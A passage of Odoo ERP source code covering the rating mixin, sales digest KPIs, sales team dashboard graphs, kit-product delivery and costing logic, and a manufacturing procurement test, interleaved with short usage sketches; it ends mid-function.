if hasattr(self, 'stage_id') and self.stage_id and hasattr(self.stage_id, 'auto_validation_kanban_state') and self.stage_id.auto_validation_kanban_state:
if rating.rating > 5:
self.write({'kanban_state': 'done'})
if rating.rating < 5:
self.write({'kanban_state': 'blocked'})
return rating
@api.multi
def rating_get_repartition(self, add_stats=False, domain=None):
""" get the repatition of rating grade for the given res_ids.
:param add_stats : flag to add stat to the result
:type add_stats : boolean
:param domain : optional extra domain of the rating to include/exclude in repartition
            :return dictionary
                if not add_stats, the dict is like
                    - key is the rating value (integer)
                    - value is the number of objects (res_model, res_id) having that value
                otherwise, key is the name of the information (string): either a stat name (avg, total, ...) or 'repartition',
                containing the same dict as if add_stats was False.
"""
base_domain = [('res_model', '=', self._name), ('res_id', 'in', self.ids), ('rating', '>=', 1), ('consumed', '=', True)]
if domain:
base_domain += domain
data = self.env['rating.rating'].read_group(base_domain, ['rating'], ['rating', 'res_id'])
        # init dict with all possible rate values, except 0 (no value for the rating)
values = dict.fromkeys(range(1, 11), 0)
values.update((d['rating'], d['rating_count']) for d in data)
# add other stats
if add_stats:
rating_number = sum(values.values())
result = {
'repartition': values,
'avg': sum(float(key * values[key]) for key in values) / rating_number if rating_number > 0 else 0,
'total': sum(it['rating_count'] for it in data),
}
return result
return values
@api.multi
def rating_get_grades(self, domain=None):
""" get the repatition of rating grade for the given res_ids.
:param domain : optional domain of the rating to include/exclude in grades computation
            :return dictionary where the key is the grade (great, okay, bad), and the value, the number of objects (res_model, res_id) having the grade
                the grades are computed as 0-30%: Bad
31-69%: Okay
70-100%: Great
"""
data = self.rating_get_repartition(domain=domain)
res = dict.fromkeys(['great', 'okay', 'bad'], 0)
for key in data:
if key >= RATING_LIMIT_SATISFIED:
res['great'] += data[key]
elif key > RATING_LIMIT_OK:
res['okay'] += data[key]
else:
res['bad'] += data[key]
return res
@api.multi
def rating_get_stats(self, domain=None):
""" get the statistics of the rating repatition
:param domain : optional domain of the rating to include/exclude in statistic computation
            :return dictionary where
                - key is the name of the information (stat name)
- value is statistic value : 'percent' contains the repartition in percentage, 'avg' is the average rate
and 'total' is the number of rating
"""
data = self.rating_get_repartition(domain=domain, add_stats=True)
result = {
'avg': data['avg'],
'total': data['total'],
'percent': dict.fromkeys(range(1, 11), 0),
}
for rate in data['repartition']:
result['percent'][rate] = (data['repartition'][rate] * 100) / data['total'] if data['total'] > 0 else 0
return result
@api.model
def _compute_parent_rating_percentage_satisfaction(self, parent_records, rating_satisfaction_days=None):
# build domain and fetch data
domain = [('parent_res_model', '=', parent_records._name), ('parent_res_id', 'in', parent_records.ids), ('rating', '>=', 1), ('consumed', '=', True)]
if rating_satisfaction_days:
domain += [('write_date', '>=', fields.Datetime.to_string(fields.datetime.now() - timedelta(days=rating_satisfaction_days)))]
data = self.env['rating.rating'].read_group(domain, ['parent_res_id', 'rating'], ['parent_res_id', 'rating'], lazy=False)
# get repartition of grades per parent id
default_grades = {'great': 0, 'okay': 0, 'bad': 0}
grades_per_parent = dict((parent_id, dict(default_grades)) for parent_id in parent_records.ids) # map: {parent_id: {'great': 0, 'bad': 0, 'ok': 0}}
for item in data:
parent_id = item['parent_res_id']
rating = item['rating']
if rating >= RATING_LIMIT_SATISFIED:
grades_per_parent[parent_id]['great'] += item['__count']
elif rating > RATING_LIMIT_OK:
grades_per_parent[parent_id]['okay'] += item['__count']
else:
grades_per_parent[parent_id]['bad'] += item['__count']
# compute percentage per parent
res = {}
for record in parent_records:
repartition = grades_per_parent.get(record.id)
res[record.id] = repartition['great'] * 100 / sum(repartition.values()) if sum(repartition.values()) else -1
return res
```
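
A minimal sketch of how a concrete model could opt into this mixin, assuming it is registered under the usual `rating.mixin` key; the model and field names below are illustrative and not part of the source above:

```python
from odoo import fields, models


class DemoTask(models.Model):
    # Hypothetical record type that should collect customer ratings.
    _name = 'x_demo.task'
    _description = 'Demo Task'
    _inherit = ['rating.mixin', 'mail.thread']

    name = fields.Char(required=True)
    project_id = fields.Many2one('x_demo.project', string='Project')

    def rating_get_parent(self):
        # Tell the mixin which Many2one links to the "parent" record so that
        # parent_res_id on rating.rating (and the satisfaction stats) get filled in.
        return 'project_id'
```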
#### File: sale_management/models/digest.py
```python
from odoo import fields, models, _
from odoo.exceptions import AccessError
class Digest(models.Model):
_inherit = 'digest.digest'
kpi_all_sale_total = fields.Boolean('All Sales')
kpi_all_sale_total_value = fields.Monetary(compute='_compute_kpi_sale_total_value')
def _compute_kpi_sale_total_value(self):
if not self.env.user.has_group('sales_team.group_sale_salesman_all_leads'):
raise AccessError(_("Do not have access, skip this data for user's digest email"))
for record in self:
start, end, company = record._get_kpi_compute_parameters()
all_channels_sales = self.env['sale.report'].read_group([
('confirmation_date', '>=', start),
('confirmation_date', '<', end),
('company_id', '=', company.id)], ['price_total'], ['price_total'])
record.kpi_all_sale_total_value = sum([channel_sale['price_total'] for channel_sale in all_channels_sales])
def compute_kpis_actions(self, company, user):
res = super(Digest, self).compute_kpis_actions(company, user)
res['kpi_all_sale_total'] = 'sale.report_all_channels_sales_action&menu_id=%s' % self.env.ref('sale.sale_menu_root').id
return res
```
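
The file above follows the usual digest pattern: one boolean toggle, one computed `*_value` field, and an entry in `compute_kpis_actions`. A stripped-down sketch of that pattern against a hypothetical `x_demo.report` model:

```python
from odoo import fields, models


class Digest(models.Model):
    _inherit = 'digest.digest'

    kpi_x_demo_count = fields.Boolean('Demo Records')
    kpi_x_demo_count_value = fields.Integer(compute='_compute_kpi_x_demo_count_value')

    def _compute_kpi_x_demo_count_value(self):
        for record in self:
            # _get_kpi_compute_parameters() yields the period bounds and company,
            # exactly as used by _compute_kpi_sale_total_value above.
            start, end, company = record._get_kpi_compute_parameters()
            record.kpi_x_demo_count_value = self.env['x_demo.report'].search_count([
                ('create_date', '>=', start),
                ('create_date', '<', end),
                ('company_id', '=', company.id),
            ])
```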
#### File: sale/models/sales_team.py
```python
from datetime import date
from odoo import api, fields, models, _
class CrmTeam(models.Model):
_inherit = 'crm.team'
use_quotations = fields.Boolean(string='Quotations', help="Check this box if you send quotations to your customers rather than confirming orders straight away. "
"This will add specific action buttons to your dashboard.")
use_invoices = fields.Boolean('Set Invoicing Target', help="Check this box to set an invoicing target for this Sales Team.")
invoiced = fields.Integer(
compute='_compute_invoiced',
string='Invoiced This Month', readonly=True,
help="Invoice revenue for the current month. This is the amount the sales "
"channel has invoiced this month. It is used to compute the progression ratio "
"of the current and target revenue on the kanban view.")
invoiced_target = fields.Integer(
string='Invoicing Target',
help="Target of invoice revenue for the current month. This is the amount the sales "
"channel estimates to be able to invoice this month.")
quotations_count = fields.Integer(
compute='_compute_quotations_to_invoice',
string='Number of quotations to invoice', readonly=True)
quotations_amount = fields.Integer(
compute='_compute_quotations_to_invoice',
string='Amount of quotations to invoice', readonly=True)
sales_to_invoice_count = fields.Integer(
compute='_compute_sales_to_invoice',
string='Number of sales to invoice', readonly=True)
dashboard_graph_model = fields.Selection(selection_add=[
('sale.report', 'Sales'),
('account.invoice.report', 'Invoices'),
])
def _compute_quotations_to_invoice(self):
non_website_teams = self.filtered(lambda team: team.team_type != 'website')
if non_website_teams:
query = self.env['sale.order']._where_calc([
('team_id', 'in', non_website_teams.ids),
('state', 'in', ['draft', 'sent']),
])
self.env['sale.order']._apply_ir_rules(query, 'read')
_, where_clause, where_clause_args = query.get_sql()
select_query = """
SELECT team_id, count(*), sum(amount_total /
CASE COALESCE(currency_rate, 0)
WHEN 0 THEN 1.0
ELSE currency_rate
END
) as amount_total
FROM sale_order
WHERE %s
GROUP BY team_id
""" % where_clause
self.env.cr.execute(select_query, where_clause_args)
quotation_data = self.env.cr.dictfetchall()
for datum in quotation_data:
self.browse(datum['team_id']).quotations_amount = datum['amount_total']
self.browse(datum['team_id']).quotations_count = datum['count']
@api.multi
def _compute_sales_to_invoice(self):
sale_order_data = self.env['sale.order'].read_group([
('team_id', 'in', self.ids),
('invoice_status','=','to invoice'),
], ['team_id'], ['team_id'])
for datum in sale_order_data:
self.browse(datum['team_id'][0]).sales_to_invoice_count = datum['team_id_count']
@api.multi
def _compute_invoiced(self):
invoice_data = self.env['account.invoice'].read_group([
('state', 'in', ['open', 'in_payment', 'paid']),
('team_id', 'in', self.ids),
('date', '<=', date.today()),
('date', '>=', date.today().replace(day=1)),
('type', 'in', ['out_invoice', 'out_refund']),
], ['amount_untaxed_signed', 'team_id'], ['team_id'])
for datum in invoice_data:
self.browse(datum['team_id'][0]).invoiced = datum['amount_untaxed_signed']
def _graph_date_column(self):
if self.dashboard_graph_model == 'sale.report':
return 'confirmation_date'
elif self.dashboard_graph_model == 'account.invoice.report':
return 'date'
return super(CrmTeam, self)._graph_date_column()
def _graph_y_query(self):
if self.dashboard_graph_model == 'sale.report':
return 'SUM(price_subtotal)'
elif self.dashboard_graph_model == 'account.invoice.report':
return 'SUM(price_total)'
return super(CrmTeam, self)._graph_y_query()
def _extra_sql_conditions(self):
if self.dashboard_graph_model == 'sale.report':
return "AND state in ('sale', 'done')"
elif self.dashboard_graph_model == 'account.invoice.report':
return "AND state in ('open', 'in_payment', 'paid')"
return super(CrmTeam, self)._extra_sql_conditions()
def _graph_title_and_key(self):
if self.dashboard_graph_model == 'sale.report':
return ['', _('Sales: Untaxed Total')] # no more title
elif self.dashboard_graph_model == 'account.invoice.report':
return ['', _('Invoices: Untaxed Total')]
return super(CrmTeam, self)._graph_title_and_key()
def _compute_dashboard_button_name(self):
quotation_teams = self.filtered('use_quotations')
quotation_teams.update({'dashboard_button_name': _("Quotations")})
(self - quotation_teams).update({'dashboard_button_name': _("Sales Orders")})
def action_primary_channel_button(self):
if hasattr(self, 'use_opportunities') and self.use_opportunities:
return super(CrmTeam, self).action_primary_channel_button()
elif self.use_quotations:
action = self.env.ref('sale.action_quotations_salesteams').read()[0]
action['context'] = {'search_default_team_id': self.id}
return action
else:
action = self.env.ref('sale.action_orders_salesteams').read()[0]
action['context'] = {'search_default_team_id': self.id}
return action
@api.onchange('team_type')
def _onchange_team_type(self):
if self.team_type == 'sales':
self.use_quotations = True
self.use_invoices = True
if not self.dashboard_graph_model:
self.dashboard_graph_model = 'sale.report'
else:
self.use_quotations = False
self.use_invoices = False
self.dashboard_graph_model = 'sale.report'
return super(CrmTeam, self)._onchange_team_type()
@api.multi
def update_invoiced_target(self, value):
return self.write({'invoiced_target': round(float(value or 0))})
```
#### File: sale_mrp/models/sale_mrp.py
```python
from odoo import api, fields, models
from odoo.tools import float_compare
class SaleOrderLine(models.Model):
_inherit = 'sale.order.line'
@api.multi
def _compute_qty_delivered(self):
super(SaleOrderLine, self)._compute_qty_delivered()
for line in self:
if line.qty_delivered_method == 'stock_move':
# In the case of a kit, we need to check if all components are shipped. Since the BOM might
# have changed, we don't compute the quantities but verify the move state.
bom = self.env['mrp.bom']._bom_find(product=line.product_id, company_id=line.company_id.id)
if bom and bom.type == 'phantom':
moves = line.move_ids.filtered(lambda m: m.picking_id and m.picking_id.state != 'cancel')
bom_delivered = moves and all([move.state == 'done' for move in moves])
if bom_delivered:
line.qty_delivered = line.product_uom_qty
else:
line.qty_delivered = 0.0
@api.multi
def _get_bom_component_qty(self, bom):
bom_quantity = self.product_uom._compute_quantity(1, bom.product_uom_id)
boms, lines = bom.explode(self.product_id, bom_quantity)
components = {}
for line, line_data in lines:
product = line.product_id.id
uom = line.product_uom_id
qty = line.product_qty
if components.get(product, False):
if uom.id != components[product]['uom']:
from_uom = uom
to_uom = self.env['uom.uom'].browse(components[product]['uom'])
qty = from_uom._compute_quantity(qty, to_uom)
components[product]['qty'] += qty
else:
# To be in the uom reference of the product
to_uom = self.env['product.product'].browse(product).uom_id
if uom.id != to_uom.id:
from_uom = uom
qty = from_uom._compute_quantity(qty, to_uom)
components[product] = {'qty': qty, 'uom': to_uom.id}
return components
def _get_qty_procurement(self):
self.ensure_one()
# Specific case when we change the qty on a SO for a kit product.
# We don't try to be too smart and keep a simple approach: we compare the quantity before
# and after update, and return the difference. We don't take into account what was already
# sent, or any other exceptional case.
bom = self.env['mrp.bom']._bom_find(product=self.product_id)
if bom and bom.type == 'phantom' and 'previous_product_uom_qty' in self.env.context:
return self.env.context['previous_product_uom_qty'].get(self.id, 0.0)
return super(SaleOrderLine, self)._get_qty_procurement()
@api.multi
@api.depends('product_id', 'move_ids.state')
def _compute_qty_delivered_method(self):
lines = self.env['sale.order.line']
for line in self:
bom = self.env['mrp.bom']._bom_find(product=line.product_id, company_id=line.company_id.id)
if bom and bom.type == 'phantom' and line.order_id.state == 'sale':
bom_delivered = all([move.state == 'done' for move in line.move_ids])
if not bom_delivered:
line.qty_delivered_method = 'manual'
lines |= line
super(SaleOrderLine, self - lines)._compute_qty_delivered_method()
class AccountInvoiceLine(models.Model):
# TDE FIXME: what is this code ??
_inherit = "account.invoice.line"
def _get_anglo_saxon_price_unit(self):
price_unit = super(AccountInvoiceLine, self)._get_anglo_saxon_price_unit()
# in case of anglo saxon with a product configured as invoiced based on delivery, with perpetual
        # valuation and real price costing method, we must find the real price for the cost of goods sold
if self.product_id.invoice_policy == "delivery":
for s_line in self.sale_line_ids:
# qtys already invoiced
qty_done = sum([x.uom_id._compute_quantity(x.quantity, x.product_id.uom_id) for x in s_line.invoice_lines if x.invoice_id.state in ('open', 'in_payment', 'paid')])
quantity = self.uom_id._compute_quantity(self.quantity, self.product_id.uom_id)
# Put moves in fixed order by date executed
moves = s_line.move_ids.sorted(lambda x: x.date)
# Go through all the moves and do nothing until you get to qty_done
# Beyond qty_done we need to calculate the average of the price_unit
# on the moves we encounter.
bom = s_line.product_id.product_tmpl_id.bom_ids and s_line.product_id.product_tmpl_id.bom_ids[0]
if bom.type == 'phantom':
average_price_unit = 0
components = s_line._get_bom_component_qty(bom)
for product_id in components:
factor = components[product_id]['qty']
prod_moves = [m for m in moves if m.product_id.id == product_id]
prod_qty_done = factor * qty_done
prod_quantity = factor * quantity
average_price_unit += factor * self._compute_average_price(prod_qty_done, prod_quantity, prod_moves)
price_unit = average_price_unit or price_unit
price_unit = self.product_id.uom_id._compute_price(price_unit, self.uom_id)
return price_unit
```
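
For reference, `_get_bom_component_qty` above returns a plain dict keyed by component product id; a rough illustration of its shape (ids and quantities invented for the example):

```python
# Illustrative only -- not real data:
components = {
    42: {'qty': 4.0, 'uom': 1},   # 4 units of the component with product id 42,
                                  # expressed in that product's reference UoM (uom id 1)
    57: {'qty': 0.5, 'uom': 3},
}
```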
#### File: sale_mrp/tests/test_sale_mrp_procurement.py
```python
import time
from odoo.tests.common import TransactionCase, Form
from odoo.tools import mute_logger
class TestSaleMrpProcurement(TransactionCase):
def test_sale_mrp(self):
warehouse0 = self.env.ref('stock.warehouse0')
# In order to test the sale_mrp module in OpenERP, I start by creating a new product 'Slider Mobile'
# I define product category Mobile Products Sellable.
with mute_logger('odoo.tests.common.onchange'):
# Suppress warning on "Changing your cost method" when creating a
# product category
pc = Form(self.env['product.category'])
pc.name = 'Mobile Products Sellable'
product_category_allproductssellable0 = pc.save()
uom_unit = self.env.ref('uom.product_uom_unit')
self.assertIn("seller_ids", self.env['product.template'].fields_get())
# I define product for Slider Mobile.
product = Form(self.env['product.template'])
product.categ_id = product_category_allproductssellable0
product.list_price = 200.0
product.name = 'Slider Mobile'
product.standard_price = 189.0
product.type = 'product'
product.uom_id = uom_unit
product.uom_po_id = uom_unit
product.route_ids.clear()
product.route_ids.add(warehouse0.manufacture_pull_id.route_id)
product.route_ids.add(warehouse0.mto_pull_id.route_id)
product_template_slidermobile0 = product.save()
with Form(self.env['mrp.bom']) as bom:
bom.product_tmpl_id = product_template_slidermobile0
# I create a sale order for product Slider mobile
so_form = Form(self.env['sale.order'])
so_form.partner_id = self.env.ref('base.res_partner_4')
with so_form.order_line.new() as line:
line.product_id = product_template_slidermobile0.product_variant_ids
line.price_unit = 200
line.product_uom_qty = 500.0
line.customer_lead = 7.0
sale_order_so0 = so_form.save()
# I confirm the sale order
sale_order_so0.action_confirm()
# I verify that a manufacturing order has been generated, and that its name and reference are correct
mo = self.env['mrp.production'].search([('origin', 'like', sale_order_so0.name)], limit=1)
self.assertTrue(mo, 'Manufacturing order has not been generated')
def test_sale_mrp_pickings(self):
""" Test sale of multiple mrp products in MTO
to avoid generating multiple deliveries
to the customer location
"""
# Create warehouse
self.customer_location = self.env['ir.model.data'].xmlid_to_res_id('stock.stock_location_customers')
warehouse_form = Form(self.env['stock.warehouse'])
warehouse_form.name = 'Test Warehouse'
warehouse_form.code = 'TWH'
self.warehouse = warehouse_form.save()
self.uom_unit = self.env.ref('uom.product_uom_unit')
# Create raw product for manufactured product
product_form = Form(self.env['product.product'])
product_form.name = 'Raw Stick'
product_form.type = 'product'
product_form.uom_id = self.uom_unit
product_form.uom_po_id = self.uom_unit
self.raw_product = product_form.save()
# Create manufactured product
product_form = Form(self.env['product.product'])
product_form.name = 'Stick'
product_form.uom_id = self.uom_unit
product_form.uom_po_id = self.uom_unit
product_form.type = 'product'
product_form.route_ids.clear()
product_form.route_ids.add(self.warehouse.manufacture_pull_id.route_id)
product_form.route_ids.add(self.warehouse.mto_pull_id.route_id)
self.finished_product = product_form.save()
        # Create a manufactured product which uses another manufactured product
product_form = Form(self.env['product.product'])
product_form.name = 'Arrow'
product_form.type = 'product'
product_form.route_ids.clear()
product_form.route_ids.add(self.warehouse.manufacture_pull_id.route_id)
product_form.route_ids.add(self.warehouse.mto_pull_id.route_id)
self.complex_product = product_form.save()
## Create raw product for manufactured product
product_form = Form(self.env['product.product'])
product_form.name = 'Raw Iron'
product_form.type = 'product'
product_form.uom_id = self.uom_unit
product_form.uom_po_id = self.uom_unit
self.raw_product_2 = product_form.save()
# Create bom for manufactured product
bom_product_form = Form(self.env['mrp.bom'])
bom_product_form.product_id = self.finished_product
bom_product_form.product_tmpl_id = self.finished_product.product_tmpl_id
bom_product_form.product_qty = 1.0
bom_product_form.type = 'normal'
with bom_product_form.bom_line_ids.new() as bom_line:
bom_line.product_id = self.raw_product
bom_line.product_qty = 2.0
self.bom = bom_product_form.save()
## Create bom for manufactured product
bom_product_form = Form(self.env['mrp.bom'])
bom_product_form.product_id = self.complex_product
bom_product_form.product_tmpl_id = self.complex_product.product_tmpl_id
with bom_product_form.bom_line_ids.new() as line:
line.product_id = self.finished_product
line.product_qty = 1.0
with bom_product_form.bom_line_ids.new() as line:
line.product_id = self.raw_product_2
line.product_qty = 1.0
self.complex_bom = bom_product_form.save()
with Form(self.warehouse) as warehouse:
warehouse.manufacture_steps = 'pbm_sam'
so_form = Form(self.env['sale.order'])
so_form.partner_id = self.env.ref('base.res_partner_4')
with so_form.order_line.new() as line:
line.product_id = self.complex_product
line.price_unit = 1
line.product_uom_qty = 1
with so_form.order_line.new() as line:
line.product_id = self.finished_product
line.price_unit = 1
line.product_uom_qty = 1
sale_order_so0 = so_form.save()
sale_order_so0.action_confirm()
pickings = sale_order_so0.picking_ids
# One delivery...
self.assertEqual(len(pickings), 1)
# ...with two products
move_lines = pickings[0].move_lines
self.assertEqual(len(move_lines), 2)
```
#### File: sale_quotation_builder/controllers/portal.py
```python
from odoo import http
from odoo.http import request
from odoo.addons.portal.controllers.portal import CustomerPortal
class CustomerPortal(CustomerPortal):
@http.route(["/sale_quotation_builder/template/<model('sale.order.template'):template>"], type='http', auth="user", website=True)
def sale_quotation_builder_template_view(self, template, **post):
values = {'template': template}
return request.render('sale_quotation_builder.so_template', values)
```
#### File: sales_team/models/crm_team.py
```python
from babel.dates import format_date
from datetime import date, datetime
from dateutil.relativedelta import relativedelta
import json
from odoo import api, fields, models, _
from odoo.exceptions import AccessError, UserError
from odoo.release import version
from odoo.tools import DEFAULT_SERVER_DATE_FORMAT as DF
class CrmTeam(models.Model):
_name = "crm.team"
_inherit = ['mail.thread']
_description = "Sales Team"
_order = "name"
@api.model
@api.returns('self', lambda value: value.id if value else False)
def _get_default_team_id(self, user_id=None):
if not user_id:
user_id = self.env.uid
company_id = self.sudo(user_id).env.user.company_id.id
team_id = self.env['crm.team'].sudo().search([
'|', ('user_id', '=', user_id), ('member_ids', '=', user_id),
'|', ('company_id', '=', False), ('company_id', 'child_of', [company_id])
], limit=1)
if not team_id and 'default_team_id' in self.env.context:
team_id = self.env['crm.team'].browse(self.env.context.get('default_team_id'))
if not team_id:
default_team_id = self.env.ref('sales_team.team_sales_department', raise_if_not_found=False)
if default_team_id:
try:
default_team_id.check_access_rule('read')
except AccessError:
return self.env['crm.team']
if (self.env.context.get('default_type') != 'lead' or default_team_id.use_leads) and default_team_id.active:
team_id = default_team_id
return team_id
def _get_default_favorite_user_ids(self):
return [(6, 0, [self.env.uid])]
name = fields.Char('Sales Team', required=True, translate=True)
active = fields.Boolean(default=True, help="If the active field is set to false, it will allow you to hide the Sales Team without removing it.")
company_id = fields.Many2one('res.company', string='Company',
default=lambda self: self.env['res.company']._company_default_get('crm.team'))
currency_id = fields.Many2one(
"res.currency", related='company_id.currency_id',
string="Currency", readonly=True)
user_id = fields.Many2one('res.users', string='Team Leader')
member_ids = fields.One2many('res.users', 'sale_team_id', string='Channel Members')
favorite_user_ids = fields.Many2many(
'res.users', 'team_favorite_user_rel', 'team_id', 'user_id',
string='Favorite Members',
default=_get_default_favorite_user_ids)
is_favorite = fields.Boolean(
string='Show on dashboard',
compute='_compute_is_favorite', inverse='_inverse_is_favorite',
help="Favorite teams to display them in the dashboard and access them easily.")
reply_to = fields.Char(string='Reply-To',
help="The email address put in the 'Reply-To' of all emails sent by Odoo about cases in this Sales Team")
color = fields.Integer(string='Color Index', help="The color of the channel")
team_type = fields.Selection([('sales', 'Sales'), ('website', 'Website')], string='Team Type', default='sales', required=True,
help="The type of this channel, it will define the resources this channel uses.")
dashboard_button_name = fields.Char(string="Dashboard Button", compute='_compute_dashboard_button_name')
dashboard_graph_data = fields.Text(compute='_compute_dashboard_graph')
dashboard_graph_type = fields.Selection([
('line', 'Line'),
('bar', 'Bar'),
], string='Type', compute='_compute_dashboard_graph', help='The type of graph this channel will display in the dashboard.')
dashboard_graph_model = fields.Selection([], string="Content", help='The graph this channel will display in the Dashboard.\n')
dashboard_graph_group = fields.Selection([
('day', 'Day'),
('week', 'Week'),
('month', 'Month'),
('user', 'Salesperson'),
], string='Group by', default='day', help="How this channel's dashboard graph will group the results.")
dashboard_graph_period = fields.Selection([
('week', 'Last Week'),
('month', 'Last Month'),
('year', 'Last Year'),
], string='Scale', default='month', help="The time period this channel's dashboard graph will consider.")
@api.depends('dashboard_graph_group', 'dashboard_graph_model', 'dashboard_graph_period')
def _compute_dashboard_graph(self):
for team in self.filtered('dashboard_graph_model'):
if team.dashboard_graph_group in (False, 'user') or team.dashboard_graph_period == 'week' and team.dashboard_graph_group != 'day' \
or team.dashboard_graph_period == 'month' and team.dashboard_graph_group != 'day':
team.dashboard_graph_type = 'bar'
else:
team.dashboard_graph_type = 'line'
team.dashboard_graph_data = json.dumps(team._get_graph())
def _compute_is_favorite(self):
for team in self:
team.is_favorite = self.env.user in team.favorite_user_ids
def _inverse_is_favorite(self):
sudoed_self = self.sudo()
to_fav = sudoed_self.filtered(lambda team: self.env.user not in team.favorite_user_ids)
to_fav.write({'favorite_user_ids': [(4, self.env.uid)]})
(sudoed_self - to_fav).write({'favorite_user_ids': [(3, self.env.uid)]})
return True
def _graph_get_dates(self, today):
""" return a coherent start and end date for the dashboard graph according to the graph settings.
"""
if self.dashboard_graph_period == 'week':
start_date = today - relativedelta(weeks=1)
elif self.dashboard_graph_period == 'year':
start_date = today - relativedelta(years=1)
else:
start_date = today - relativedelta(months=1)
# we take the start of the following month/week/day if we group by month/week/day
# (to avoid having twice the same month/week/day from different years/month/week)
if self.dashboard_graph_group == 'month':
start_date = date(start_date.year + start_date.month // 12, start_date.month % 12 + 1, 1)
# handle period=week, grouping=month for silly managers
if self.dashboard_graph_period == 'week':
start_date = today.replace(day=1)
elif self.dashboard_graph_group == 'week':
start_date += relativedelta(days=8 - start_date.isocalendar()[2])
# add a week to make sure no overlapping is possible in case of year period (will display max 52 weeks, avoid case of 53 weeks in a year)
if self.dashboard_graph_period == 'year':
start_date += relativedelta(weeks=1)
else:
start_date += relativedelta(days=1)
return [start_date, today]
def _graph_date_column(self):
return 'create_date'
def _graph_x_query(self):
if self.dashboard_graph_group == 'user':
return 'user_id'
elif self.dashboard_graph_group == 'week':
return 'EXTRACT(WEEK FROM %s)' % self._graph_date_column()
elif self.dashboard_graph_group == 'month':
return 'EXTRACT(MONTH FROM %s)' % self._graph_date_column()
else:
return 'DATE(%s)' % self._graph_date_column()
def _graph_y_query(self):
raise UserError(_('Undefined graph model for Sales Team: %s') % self.name)
def _extra_sql_conditions(self):
return ''
def _graph_title_and_key(self):
""" Returns an array containing the appropriate graph title and key respectively.
The key is for lineCharts, to have the on-hover label.
"""
return ['', '']
def _graph_data(self, start_date, end_date):
""" return format should be an iterable of dicts that contain {'x_value': ..., 'y_value': ...}
x_values should either be dates, weeks, months or user_ids depending on the self.dashboard_graph_group value.
y_values are floats.
"""
query = """SELECT %(x_query)s as x_value, %(y_query)s as y_value
FROM %(table)s
WHERE team_id = %(team_id)s
AND DATE(%(date_column)s) >= %(start_date)s
AND DATE(%(date_column)s) <= %(end_date)s
%(extra_conditions)s
GROUP BY x_value;"""
# apply rules
if not self.dashboard_graph_model:
raise UserError(_('Undefined graph model for Sales Team: %s') % self.name)
GraphModel = self.env[self.dashboard_graph_model]
graph_table = GraphModel._table
extra_conditions = self._extra_sql_conditions()
where_query = GraphModel._where_calc([])
GraphModel._apply_ir_rules(where_query, 'read')
from_clause, where_clause, where_clause_params = where_query.get_sql()
if where_clause:
extra_conditions += " AND " + where_clause
query = query % {
'x_query': self._graph_x_query(),
'y_query': self._graph_y_query(),
'table': graph_table,
'team_id': "%s",
'date_column': self._graph_date_column(),
'start_date': "%s",
'end_date': "%s",
'extra_conditions': extra_conditions
}
self._cr.execute(query, [self.id, start_date, end_date] + where_clause_params)
return self.env.cr.dictfetchall()
def _get_graph(self):
def get_week_name(start_date, locale):
""" Generates a week name (string) from a datetime according to the locale:
E.g.: locale start_date (datetime) return string
"en_US" November 16th "16-22 Nov"
"en_US" December 28th "28 Dec-3 Jan"
"""
if (start_date + relativedelta(days=6)).month == start_date.month:
short_name_from = format_date(start_date, 'd', locale=locale)
else:
short_name_from = format_date(start_date, 'd MMM', locale=locale)
short_name_to = format_date(start_date + relativedelta(days=6), 'd MMM', locale=locale)
return short_name_from + '-' + short_name_to
self.ensure_one()
values = []
today = fields.Date.from_string(fields.Date.context_today(self))
start_date, end_date = self._graph_get_dates(today)
graph_data = self._graph_data(start_date, end_date)
# line graphs and bar graphs require different labels
if self.dashboard_graph_type == 'line':
x_field = 'x'
y_field = 'y'
else:
x_field = 'label'
y_field = 'value'
# generate all required x_fields and update the y_values where we have data for them
locale = self._context.get('lang') or 'en_US'
if self.dashboard_graph_group == 'day':
for day in range(0, (end_date - start_date).days + 1):
short_name = format_date(start_date + relativedelta(days=day), 'd MMM', locale=locale)
values.append({x_field: short_name, y_field: 0})
for data_item in graph_data:
index = (data_item.get('x_value') - start_date).days
values[index][y_field] = data_item.get('y_value')
elif self.dashboard_graph_group == 'week':
weeks_in_start_year = int(date(start_date.year, 12, 28).isocalendar()[1]) # This date is always in the last week of ISO years
for week in range(0, (end_date.isocalendar()[1] - start_date.isocalendar()[1]) % weeks_in_start_year + 1):
short_name = get_week_name(start_date + relativedelta(days=7 * week), locale)
values.append({x_field: short_name, y_field: 0})
for data_item in graph_data:
index = int((data_item.get('x_value') - start_date.isocalendar()[1]) % weeks_in_start_year)
values[index][y_field] = data_item.get('y_value')
elif self.dashboard_graph_group == 'month':
for month in range(0, (end_date.month - start_date.month) % 12 + 1):
short_name = format_date(start_date + relativedelta(months=month), 'MMM', locale=locale)
values.append({x_field: short_name, y_field: 0})
for data_item in graph_data:
index = int((data_item.get('x_value') - start_date.month) % 12)
values[index][y_field] = data_item.get('y_value')
elif self.dashboard_graph_group == 'user':
for data_item in graph_data:
values.append({x_field: self.env['res.users'].browse(data_item.get('x_value')).name or _('Not Defined'), y_field: data_item.get('y_value')})
else:
for data_item in graph_data:
values.append({x_field: data_item.get('x_value'), y_field: data_item.get('y_value')})
[graph_title, graph_key] = self._graph_title_and_key()
color = '#875A7B' if '+e' in version else '#7c7bad'
return [{'values': values, 'area': True, 'title': graph_title, 'key': graph_key, 'color': color}]
def _compute_dashboard_button_name(self):
""" Sets the adequate dashboard button name depending on the Sales Team's options
"""
for team in self:
team.dashboard_button_name = _("Big Pretty Button :)") # placeholder
def action_primary_channel_button(self):
""" skeleton function to be overloaded
It will return the adequate action depending on the Sales Team's options
"""
return False
def _onchange_team_type(self):
""" skeleton function defined here because it'll be called by crm and/or sale
"""
self.ensure_one()
@api.model
def create(self, values):
team = super(CrmTeam, self.with_context(mail_create_nosubscribe=True)).create(values)
if values.get('member_ids'):
team._add_members_to_favorites()
return team
@api.multi
def write(self, values):
res = super(CrmTeam, self).write(values)
if values.get('member_ids'):
self._add_members_to_favorites()
return res
def _add_members_to_favorites(self):
for team in self:
team.favorite_user_ids = [(4, member.id) for member in team.member_ids]
```
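
The dashboard graph on `crm.team` is meant to be fed by other modules: they extend `dashboard_graph_model` with `selection_add` and override the `_graph_*` hooks, as `sale/models/sales_team.py` does earlier in this file set. A stripped-down sketch of that pattern against a hypothetical `x_demo.report` model:

```python
from odoo import fields, models, _


class CrmTeam(models.Model):
    _inherit = 'crm.team'

    dashboard_graph_model = fields.Selection(selection_add=[('x_demo.report', 'Demo')])

    def _graph_date_column(self):
        if self.dashboard_graph_model == 'x_demo.report':
            return 'date'                     # column used for the date filter / x axis
        return super(CrmTeam, self)._graph_date_column()

    def _graph_y_query(self):
        if self.dashboard_graph_model == 'x_demo.report':
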